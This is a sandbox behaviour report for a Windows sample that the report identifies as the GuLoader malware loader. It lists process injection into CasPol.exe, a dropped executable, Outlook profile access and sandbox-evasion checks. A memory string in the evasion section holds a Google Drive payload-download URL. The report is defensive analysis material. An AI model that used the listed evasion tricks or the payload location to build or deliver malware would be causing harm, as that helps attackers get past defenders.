          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4954D1_2_02F4954D
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F54D4B1_2_02F54D4B
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E53B1_2_02F4E53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0104C0C04_2_0104C0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010443204_2_01044320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01043A504_2_01043A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0104BA884_2_0104BA88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_010437084_2_01043708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0111255C4_2_0111255C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01278C204_2_01278C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012790C84_2_012790C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012759604_2_01275960
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012733304_2_01273330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0151F5304_2_0151F530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01516DD04_2_01516DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_015100404_2_01510040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0151CCF04_2_0151CCF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0151EFB04_2_0151EFB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01515BA84_2_01515BA8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0151BAB04_2_0151BAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01516D784_2_01516D78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_015145304_2_01514530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0151001E4_2_0151001E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0151EA784_2_0151EA78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0176B04D4_2_0176B04D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_017618C04_2_017618C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01768F704_2_01768F70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01762B404_2_01762B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D7A5E084_2_1D7A5E08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D7A5DF84_2_1D7A5DF8
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F55355 LoadLibraryA,NtAllocateVirtualMemory,1_2_02F55355
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F5770E NtResumeThread,1_2_02F5770E
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F57165 NtProtectVirtualMemory,1_2_02F57165
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAsOpenFile.exeL vs xcVh7ZmH4Y.exe
          Source: xcVh7ZmH4Y.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AsOpenFile.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
          Source: xcVh7ZmH4Y.exeVirustotal: Detection: 38%
          Source: xcVh7ZmH4Y.exeMetadefender: Detection: 22%
          Source: xcVh7ZmH4Y.exeReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile read: C:\Users\user\Desktop\xcVh7ZmH4Y.exeJump to behavior
          Source: xcVh7ZmH4Y.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\xcVh7ZmH4Y.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" Jump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" Jump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\umsqbqzt.0jvJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile created: C:\Users\user\AppData\Local\Temp\nsn9685.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/10@3/4
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_0040498A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:428:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:428:304:WilStaging_02
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile written: C:\Users\user\AppData\Local\Temp\duperinger.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: xcVh7ZmH4Y.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_710330C0 push eax; ret 1_2_710330EE
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F46E83 push ss; ret 1_2_02F46E46
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F48E76 push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F48E2E push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F46E15 push ss; ret 1_2_02F46E46
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F48BF9 push eax; iretd 1_2_02F48C12
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F43F73 push es; iretd 1_2_02F43F74
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F46B7F push es; ret 1_2_02F46B80
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F48F01 push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F484E7 push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F471E1 push FFFFFFA5h; ret 1_2_02F471E3
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F455E3 pushad ; ret 1_2_02F455E4
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F47DC9 push esi; iretd 1_2_02F47DCA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0104FA58 push edx; ret 4_2_0104FA5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01272177 push edi; retn 0000h4_2_01272179
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_71031BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71031BFF
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile created: C:\Users\user\AppData\Local\Temp\AsOpenFile.exeJump to dropped file
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile created: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VSSBX_L5DESUONWRHCBF42FII8WZHQEA
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209733648.0000000000823000.00000004.00000020.00020000.00000000.sdmp, xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209406017.00000000007DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5236Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsOpenFile.exeJump to dropped file
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4AAF1 rdtsc 1_2_02F4AAF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01276BD1 sidt fword ptr [edi+edx*4-54h]4_2_01276BD1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01271C10 smsw eax4_2_01271C10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9935Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_0104EAC8 sgdt fword ptr [eax]4_2_0104EAC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeAPI call chain: ExitProcess graph end nodegraph_1-7960
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeAPI call chain: ExitProcess graph end nodegraph_1-7804
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
